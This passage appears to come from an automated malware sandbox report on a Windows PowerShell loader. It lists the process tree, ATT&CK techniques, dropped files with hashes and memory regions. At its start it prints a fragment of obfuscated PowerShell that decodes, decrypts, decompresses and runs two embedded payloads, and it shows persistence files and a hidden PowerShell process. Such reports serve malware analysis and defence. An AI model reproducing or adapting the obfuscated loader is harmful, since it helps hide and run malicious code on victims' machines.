}}$payloads_var=[string[]]$ooNpe.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp7D88.tmp.bat
7⤵
PID:2092

C:\Windows\system32\chcp.com
chcp 65001
8⤵
PID:4804

C:\Windows\system32\taskkill.exe
TaskKill /F /IM 3964
8⤵
- Kills process with taskkill
PID:624

C:\Windows\system32\timeout.exe
Timeout /T 2 /Nobreak
8⤵
- Delays execution with timeout.exe
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:2724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:2396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3504

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8
1⤵
PID:4876

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_df3ngvok.lxn.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp7D88.tmp.bat
Filesize
57B

MD5
84366af9d199b24104065d38216bb1cf

SHA1
9c30dcfdda6b29a9fc4c030e1ea575994a669488

SHA256
46fb33f5e30a76d2bdd2e135818074178fd66e2fb6289111afec0ed1fbaa5240

SHA512
d4f639ab36fd24409b69ca5f5f0657f3200501a20f4044e061e87ab359f0e9ad0739b3b2751106c44a76bbeec1584b8d442dc17382d06f9a0f8a4270f09e7f3f

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.bat
Filesize
2.3MB

MD5
4b2a4b79e27f6dcbd8b9bc440bbf5ed1

SHA1
d4cdd6ca2032e4bda033b45091934a43f54cac54

SHA256
c5b08c3dbec0b169f328c5935a415fd061090781f82bbaa89647dfefe592217a

SHA512
10e509f80cda74b7175bfbfbdf74c56b493cbe5d139d0049f9ff2a753012f9f358c6c623f697a6a39576f263dcb6e20acecb7d9d2bc56a6a9c1a68d8d79c920c

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_599.vbs
Filesize
124B

MD5
01ab4014ff9173b34107937c8bbd34fd

SHA1
72d0f80f0b52cafac865ae3537b94071afc09b9e

SHA256
a9357bb43016080e42f219a84ccc411e8b4b236f136f8cd90ee1f25db6275ef6

SHA512
a6407427f144f93675fce74ee77fe42e9490252ec7fb50fcba7c95f8d4734de4173dde96460d9ce0ee286fc62546c191b5ffc33e375540ee3ab77173c99c5ca3

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
memory/380-65-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/512-114-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/548-115-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/780-66-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/956-87-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/1016-28-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1016-30-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1016-33-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1016-29-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/1068-88-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/1556-71-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/1720-116-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/1916-113-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/2152-70-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/2256-16-0x0000021839D30000-0x0000021839D38000-memory.dmp

Filesize
32KB

Download
memory/2256-17-0x000002183A220000-0x000002183A3D8000-memory.dmp

Filesize
1.7MB

Download
memory/2256-10-0x0000021839CD0000-0x0000021839CF2000-memory.dmp

Filesize
136KB

Download
memory/2256-11-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/2256-12-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/2256-0-0x00007FFBEE9A3000-0x00007FFBEE9A5000-memory.dmp

Filesize
8KB

Download
memory/2256-14-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/2256-13-0x0000021839D50000-0x0000021839D94000-memory.dmp

Filesize
272KB

Download
memory/2256-15-0x000002183A1A0000-0x000002183A216000-memory.dmp

Filesize
472KB

Download
memory/2256-41-0x00007FFBEE9A0000-0x00007FFBEF461000-memory.dmp

Filesize
10.8MB

Download
memory/2360-62-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/2548-67-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/2556-64-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/2952-61-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/3164-52-0x00000000028E0000-0x000000000290A000-memory.dmp

Filesize
168KB

Download
memory/3164-59-0x00007FFBCE610000-0x00007FFBCE620000-memory.dmp

Filesize
64KB

Download
memory/3964-60-0x00000161443A0000-0x0000016144532000-memory.dmp

Filesize
1.6MB

Download